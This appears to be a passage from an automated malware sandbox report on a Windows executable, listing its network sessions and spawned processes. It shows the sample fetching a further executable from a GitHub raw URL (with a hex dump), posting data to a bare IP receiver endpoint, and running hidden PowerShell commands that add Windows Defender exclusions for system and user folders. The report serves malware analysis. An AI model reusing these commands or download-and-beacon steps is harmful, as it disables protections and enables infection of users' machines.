                          Host: github.com
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          2024-08-27 10:55:35 UTC547INHTTP/1.1 302 Found
                          Server: GitHub.com
                          Date: Tue, 27 Aug 2024 10:55:35 GMT
                          Content-Type: text/html; charset=utf-8
                          Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          Access-Control-Allow-Origin:
                          Location: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
                          Cache-Control: no-cache
                          Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                          X-Frame-Options: deny
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 0
                          Referrer-Policy: no-referrer-when-downgrade
                          2024-08-27 10:55:35 UTC3260INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                          Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449739185.199.109.1334436120C:\Users\user\Desktop\1feP5qTCl0.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 10:55:35 UTC204OUTGET /workhasf/kelm/main/iconozave.exe HTTP/1.1
                          Host: raw.githubusercontent.com
                          User-Agent: Go-http-client/1.1
                          Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe
                          Accept-Encoding: gzip
                          2024-08-27 10:55:35 UTC898INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 38912
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: application/octet-stream
                          ETag: "12c37a0d92e3f8714d00d8ffa40d644b8e2520270caa1a870ac073d1e42f9dd0"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: 6C35:16B1:419376:488FF3:66CDB0A7
                          Accept-Ranges: bytes
                          Date: Tue, 27 Aug 2024 10:55:35 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740037-EWR
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1724756136.654126,VS0,VE50
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: 8a2178ee78a21770472bc4dccdc7e4614672539b
                          Expires: Tue, 27 Aug 2024 11:00:35 GMT
                          Source-Age: 0
                          2024-08-27 10:55:35 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 8e cb ea b5 ef a5 b9 b5 ef a5 b9 b5 ef a5 b9 b3 6e a6 b8 b1 ef a5 b9 fe 97 a4 b8 b8 ef a5 b9 b5 ef a4 b9 a0 ef a5 b9 da 6e a1 b8 a9 ef a5 b9 da 6e a7 b8 b4 ef a5 b9 52 69 63 68 b5 ef a5 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 53 cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 26 00 84 00 00 00 14 00 00 00 00 00 00 30 1d 00 00 00 10 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nnnRichPELPSf&0
                          2024-08-27 10:55:35 UTC1378INData Raw: 52 e8 88 7f 00 00 83 c4 08 89 45 ec 8b 45 f8 8b 48 08 ba 04 00 00 00 6b c2 00 81 bc 01 1a 04 00 00 4c 11 d2 ca 75 27 6a 00 8b 4d f8 8b 51 08 52 8b 45 08 50 8b 4d f8 83 c1 04 51 8b 55 f8 8b 02 50 e8 28 25 00 00 83 c4 14 e9 29 01 00 00 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 81 fa 80 00 00 00 0f 83 0a 01 00 00 8b 45 f8 8b 48 08 0f b6 55 ff 83 bc 91 1a 04 00 00 00 75 02 eb d1 8b 45 f8 8b 48 08 0f b6 55 ff 0f b6 84 11 1a 07 00 00 83 f8 01 75 3c 83 7d f0 00 75 36 8b 4d 0c 83 c1 2c 51 e8 a2 7e 00 00 83 c4 04 89 45 f4 83 7d f4 00 74 1e 8b 55 f4 52 e8 2d 10 00 00 83 c4 04 d1 e0 50 8b 45 f4 50 e8 be 7e 00 00 83 c4 08 89 45 f0 83 7d f0 00 74 16 8b 4d f8 8b 51 08 0f b6 45 ff 8b 8c 82 1a 04 00 00 3b 4d f0 74 2c 8b 55 f8 8b 42 08 0f b6 4d ff 0f b6 94
                          Data Ascii: REEHkLu'jMQREPMQUP(%)EMMUEHUuEHUu<}u6M,Q~E}tUR-PEP~E}tMQE;Mt,UBM
                          2024-08-27 10:55:35 UTC1378INData Raw: 0c 00 00 83 c4 08 85 c0 74 07 b8 01 00 00 00 eb 02 33 c0 8b e5 5d c3 cc cc cc cc cc 55 8b ec 83 ec 14 e8 55 05 00 00 e8 50 03 00 00 85 c0 75 07 33 c0 e9 ce 00 00 00 68 8d bd c1 3f a1 78 b0 40 00 50 e8 d5 00 00 00 83 c4 08 a3 94 b0 40 00 83 3d 94 b0 40 00 00 75 07 33 c0 e9 a6 00 00 00 c7 45 f0 90 b0 40 00 8b 4d f0 89 4d f8 c7 45 ec 78 b0 40 00 8b 55 ec 89 55 f4 8b 45 f4 83 e8 04 89 45 f4 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 83 fa 27 73 66 8b 45 f8 83 38 00 75 16 8b 4d f4 83 c1 04 89 4d f4 8b 55 f8 83 c2 04 89 55 f8 eb d2 eb 18 8b 45 f8 8b 08 3b 0d 94 b0 40 00 75 0b 8b 55 f8 83 c2 04 89 55 f8 eb b8 8b 45 f8 8b 08 51 8b 55 f4 8b 02 50 e8 3b 00 00 00 83 c4 08 8b 4d f8 89 01 8b 55 f8 83 3a 00 75 04 33 c0 eb 10 8b 45 f8 83 c0 04 89 45 f8 eb
                          Data Ascii: t3]UUPu3h?x@P@=@u3E@MMEx@UUEEEMMU'sfE8uMMUUE;@uUUEQUP;MU:u3EE
                          2024-08-27 10:55:35 UTC1378INData Raw: 8c b0 40 00 83 ae 0c 5f 75 06 33 c0 eb 07 eb 05 b8 01 00 00 00 8b e5 5d c3 cc 55 8b ec 33 c0 74 2b 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 00 a0 40 00 6a 00 6a 00 6a 00 6a 00 6a 00 e8 12 77 00 00 6a 00 6a 00 ff 15 64 a0 40 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 e8 54 0d 00 00 83 c4 04 e8 4c 22 00 00 e8 e7 01 00 00 e8 32 fb ff ff 5d c3 55 8b ec e8 38 fa ff ff 85 c0 74 22 e8 9f 01 00 00 85 c0 74 19 e8 96 20 00 00 85 c0 74 10 8b 45 08 50 e8 49 0b 00 00 83 c4 04 85 c0 75 08 6a 00 ff 15 14 a0 40 00 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 c7 45 f8 00 00 00 00 33 c0 66 89 45 fc eb 0c 66 8b 4d fc 66 83 c1 01 66 89 4d fc 0f b7 55 fc 81 fa e8 03 00 00 73 19 0f b7 45 fc 8b 4d 08 83 7c 81 10 00 74 09 c7 45 f8 01 00 00 00 eb 02 eb
                          Data Ascii: @_u3]U3t+jjjjjj@jjjjjwjjd@]UEPTL"2]U8t"t tEPIuj@]UE3fEfMffMUsEM|tE
                          2024-08-27 10:55:35 UTC1378INData Raw: 8b 4d 08 0f b7 11 83 fa 5a 7f 0f 8b 45 08 0f b7 08 83 c1 20 8b 55 08 66 89 0a 8b 45 08 83 c0 02 89 45 08 eb c6 5d c3 cc 55 8b ec 83 ec 0c 8b 45 08 89 45 fc 8b 4d 0c 89 4d f8 8b 55 fc 8b 45 f8 66 8b 08 66 89 0a 8b 55 fc 0f b7 02 89 45 f4 8b 4d fc 83 c1 02 89 4d fc 8b 55 f8 83 c2 02 89 55 f8 83 7d f4 00 74 02 eb d1 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 08 50 e8 41 00 00 00 83 c4 04 83 c0 01 89 45 f8 8b 4d f8 d1 e1 51 e8 7d fc ff ff 83 c4 04 89 45 fc 83 7d fc 00 74 16 8b 55 f8 d1 e2 52 8b 45 08 50 8b 4d fc 51 e8 ce fc ff ff 83 c4 0c 8b 45 fc 8b e5 5d c3 cc cc cc cc 55 8b ec 51 8b 45 08 89 45 fc 8b 4d fc 0f b7 11 85 d2 74 0b 8b 45 fc 83 c0 02 89 45 fc eb eb 8b 45 fc 2b 45 08 d1 f8 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 8b 45 08
                          Data Ascii: MZE UfEE]UEEMMUEffUEMMUU}tE]UEPAEMQ}E}tUREPMQE]UQEEMtEEE+E]UQE
                          2024-08-27 10:55:35 UTC1378INData Raw: ff 83 c4 04 89 45 f0 68 16 04 00 00 6a 00 8b 4d f0 51 e8 1f f9 ff ff 83 c4 0c 68 16 04 00 00 8b 55 0c 03 55 f8 52 8b 45 f0 50 e8 57 f8 ff ff 83 c4 0c 8b 4d f0 51 8b 55 08 52 e8 c7 eb ff ff 83 c4 08 8b 45 f0 50 e8 ab f7 ff ff 83 c4 04 8b 4d f8 81 c1 16 04 00 00 89 4d f8 8b 55 08 8a 82 b8 0f 00 00 2c 01 8b 4d 08 88 81 b8 0f 00 00 e9 9e 00 00 00 0f b6 55 ff 0f b6 44 15 ac 83 f8 02 0f 85 8c 00 00 00 8b 4d 08 8a 91 b8 0f 00 00 80 c2 01 8b 45 08 88 90 b8 0f 00 00 68 0b 0b 00 00 e8 12 f7 ff ff 83 c4 04 89 45 ec 68 0b 0b 00 00 6a 00 8b 4d ec 51 e8 7c f8 ff ff 83 c4 0c 68 0b 0b 00 00 8b 55 0c 03 55 f8 52 8b 45 ec 50 e8 b4 f7 ff ff 83 c4 0c 8b 4d ec 51 8b 55 08 52 e8 34 e8 ff ff 83 c4 08 8b 45 ec 50 e8 08 f7 ff ff 83 c4 04 8b 4d f8 81 c1 0b 0b 00 00 89 4d f8 8b 55
                          Data Ascii: EhjMQhUUREPWMQUREPMMU,MUDMEhEhjMQ|hUUREPMQUR4EPMMU
                          2024-08-27 10:55:35 UTC1378INData Raw: 00 00 6a 00 8d 4d f0 51 8d 55 f8 52 6a 00 68 13 00 00 20 8b 45 08 50 ff 15 20 b1 40 00 85 c0 74 57 81 7d f8 94 01 00 00 74 12 81 7d f8 90 01 00 00 74 09 81 7d f8 f4 01 00 00 72 16 8b 4d fc 0f b6 51 08 83 fa 01 75 08 6a 00 ff 15 14 a0 40 00 eb 26 81 7d f8 c9 00 00 00 74 09 81 7d f8 c8 00 00 00 75 14 8b 45 fc 0f b6 48 08 83 f9 05 75 08 6a 00 ff 15 14 a0 40 00 6a 00 8b 55 08 52 ff 15 04 b1 40 00 e9 d1 00 00 00 81 7d 10 00 00 04 00 0f 85 94 00 00 00 8b 45 fc 8b 4d 14 8b 11 89 50 1c 8b 45 fc 8b 48 18 8b 55 fc 03 4a 1c 8b 45 fc 89 48 18 8b 4d fc 83 79 1c 00 75 21 8b 55 fc 83 7a 04 04 74 0a 8b 45 fc c7 40 04 03 00 00 00 8b 4d 0c 51 e8 bc f1 ff ff 83 c4 04 eb 4b 8b 55 fc 8b 42 18 50 8b 4d fc 8b 51 0c 52 e8 24 f3 ff ff 83 c4 08 8b 4d fc 89 41 0c 8b 55 fc 83 7a 0c
                          Data Ascii: jMQURjh EP @tW}t}t}rMQuj@&}t}uEHuj@jUR@}EMPEHUJEHMyu!UztE@MQKUBPMQR$MAUz
                          2024-08-27 10:55:35 UTC1378INData Raw: cc cc 55 8b ec 51 68 2d b0 40 00 8b 45 08 83 c0 20 50 e8 1b ef ff ff 83 c4 08 c7 45 fc 00 00 fe 7f 8b 4d 08 8b 55 fc 8b 82 60 02 00 00 89 81 15 08 00 00 8b 4d 08 8b 55 fc 8b 82 6c 02 00 00 89 81 0d 08 00 00 8b 4d 08 8b 55 fc 8b 82 70 02 00 00 89 81 11 08 00 00 68 06 b0 40 00 8b 4d 08 51 e8 cd ee ff ff 83 c4 08 68 52 b0 40 00 8b 55 08 83 c2 07 52 e8 b9 ee ff ff 83 c4 08 8b 45 08 50 e8 cd 5a 00 00 83 c4 04 8b 4d 08 51 e8 41 58 00 00 83 c4 04 8b 55 08 52 e8 b5 59 00 00 83 c4 04 6a 01 8b 45 08 50 e8 37 59 00 00 83 c4 08 8b 4d 08 51 e8 5b 5a 00 00 83 c4 04 8b 55 08 52 e8 2f 5a 00 00 83 c4 04 8b 45 08 50 e8 d3 59 00 00 83 c4 04 8b 4d 08 51 e8 e7 59 00 00 83 c4 04 8b 55 08 52 e8 8b 5a 00 00 83 c4 04 8b e5 5d c3 cc cc cc cc 55 8b ec 81 ec 38 0f 00 00 68 33 0f 00
                          Data Ascii: UQh-@E PEMU`MUlMUph@MQhR@UREPZMQAXURYjEP7YMQ[ZUR/ZEPYMQYURZ]U8h3
                          2024-08-27 10:55:35 UTC1378INData Raw: d7 f5 ff ff 02 8b 4d 14 8a 11 88 95 b0 f5 ff ff 68 21 06 00 00 6a 00 8d 85 d8 f9 ff ff 50 e8 ed e8 ff ff 83 c4 0c 8b 4d 10 51 8d 95 e8 fd ff ff 52 e8 6a ea ff ff 83 c4 08 8b 45 14 05 09 02 00 00 50 8d 8d d8 f9 ff ff 51 e8 52 ea ff ff 83 c4 08 68 08 02 00 00 8b 55 14 83 c2 01 52 8d 85 e0 fb ff ff 50 e8 97 e7 ff ff 83 c4 0c 0f b6 4d 18 51 8b 55 14 52 8d 85 d8 f9 ff ff 50 e8 2f 01 00 00 83 c4 0c 0f b6 c8 85 c9 75 05 e9 15 01 00 00 0f b6 55 18 8b 45 14 0f b6 8c 10 9a 06 00 00 83 f9 01 75 46 8b 55 0c 52 81 ec 28 04 00 00 b9 09 01 00 00 8d b5 b0 f5 ff ff 8b fc f3 a5 66 a5 a4 81 ec 24 06 00 00 b9 88 01 00 00 8d b5 d8 f9 ff ff 8b fc f3 a5 a4 8b 45 08 50 e8 b1 fc ff ff 81 c4 54 0a 00 00 e9 af 00 00 00 0f b6 4d 18 8b 55 14 0f b6 84 0a 9a 06 00 00 85 c0 0f 85 98 00
                          Data Ascii: Mh!jPMQRjEPQRhURPMQURP/uUEuFUR(f$EPTMU
                          2024-08-27 10:55:35 UTC1378INData Raw: 00 68 27 04 00 00 6a 00 8d 85 ac fb ff ff 50 e8 9a e3 ff ff 83 c4 0c 68 ff 00 00 00 8d 8d ac fb ff ff 51 e8 f6 4e 00 00 83 c4 08 ba 01 00 00 00 6b c2 00 c6 84 05 d3 fb ff ff 05 6a 26 6a 00 8d 4d d4 51 e8 66 e3 ff ff 83 c4 0c 8d 55 d4 52 e8 6a 00 00 00 83 c4 04 68 27 04 00 00 8d 85 ac fb ff ff 50 b9 01 00 00 00 6b d1 00 03 55 fc 52 e8 8a e2 ff ff 83 c4 0c 6a 26 8d 45 d4 50 b9 01 00 00 00 69 d1 27 04 00 00 03 55 fc 52 e8 6d e2 ff ff 83 c4 0c 6a 05 68 4d 04 00 00 8b 45 fc 50 8b 4d 08 51 e8 f6 ed ff ff 83 c4 10 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 c6 40 25 01 68 2d b0 40 00 8b 4d 08 51 e8 98 e3 ff ff 83 c4 08 5d c3 cc cc cc 55 8b ec 83 ec 0c e8 95 01 00 00 85 c0 74 09 83 3d e8 b0 40 00 00 75 0c e8 73 06 00 00 33 c0 e9 61
                          Data Ascii: h'jPhQNkj&jMQfURjh'PkURj&EPi'URmjhMEPMQ]UE@%h-@MQ]Ut=@us3a


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.44974045.125.66.184436044C:\Reka\rapnewsa.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 10:55:39 UTC287OUTPOST /api/receiver/recv HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
                          Content-Length: 3160
                          Host: 45.125.66.18
                          2024-08-27 10:55:39 UTC3160OUTData Raw: 00 7b 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
                          2024-08-27 10:55:39 UTC231INHTTP/1.1 201 Created
                          Server: nginx/1.18.0
                          Date: Tue, 27 Aug 2024 10:55:39 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 4230
                          Connection: close
                          X-Powered-By: Express
                          ETag: W/"1086-eeEIvwQRvsIx4B3isHTXuBfT8l0"
                          2024-08-27 10:55:39 UTC4230INData Raw: 01 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii:


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.44974134.194.69.2134436120C:\Users\user\Desktop\1feP5qTCl0.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 10:55:43 UTC95OUTGET /get HTTP/1.1
                          Host: httpbin.org
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          2024-08-27 10:55:43 UTC225INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 10:55:43 GMT
                          Content-Type: application/json
                          Content-Length: 238
                          Connection: close
                          Server: gunicorn/19.9.0
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Credentials: true
                          2024-08-27 10:55:43 UTC238INData Raw: 7b 0a 20 20 22 61 72 67 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 22 48 6f 73 74 22 3a 20 22 68 74 74 70 62 69 6e 2e 6f 72 67 22 2c 20 0a 20 20 20 20 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 22 2c 20 0a 20 20 20 20 22 58 2d 41 6d 7a 6e 2d 54 72 61 63 65 2d 49 64 22 3a 20 22 52 6f 6f 74 3d 31 2d 36 36 63 64 62 30 61 66 2d 35 65 33 61 62 36 39 31 37 36 32 32 62 64 62 34 30 64 61 32 37 38 33 62 22 0a 20 20 7d 2c 20 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 20 0a 20 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 62 69 6e 2e 6f 72 67 2f 67 65 74 22 0a 7d 0a
                          Data Ascii: { "args": {}, "headers": { "Host": "httpbin.org", "User-Agent": "Go-http-client/1.1", "X-Amzn-Trace-Id": "Root=1-66cdb0af-5e3ab6917622bdb40da2783b" }, "origin": "8.46.123.33", "url": "https://httpbin.org/get"}


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:06:55:04
                          Start date:27/08/2024
                          Path:C:\Users\user\Desktop\1feP5qTCl0.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\1feP5qTCl0.exe"
                          Imagebase:0x2e0000
                          File size:8'077'824 bytes
                          MD5 hash:A499C507987982C951093E21DF0C0D96
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Go lang
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:06:55:10
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:06:55:10
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:06:55:13
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:06:55:13
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:06:55:15
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:06:55:15
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:06:55:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:06:55:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:06:55:20
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:06:55:20
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:06:55:23
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:14
                          Start time:06:55:23
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:15
                          Start time:06:55:25
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:16
                          Start time:06:55:25
                          Start date:27/08/2024
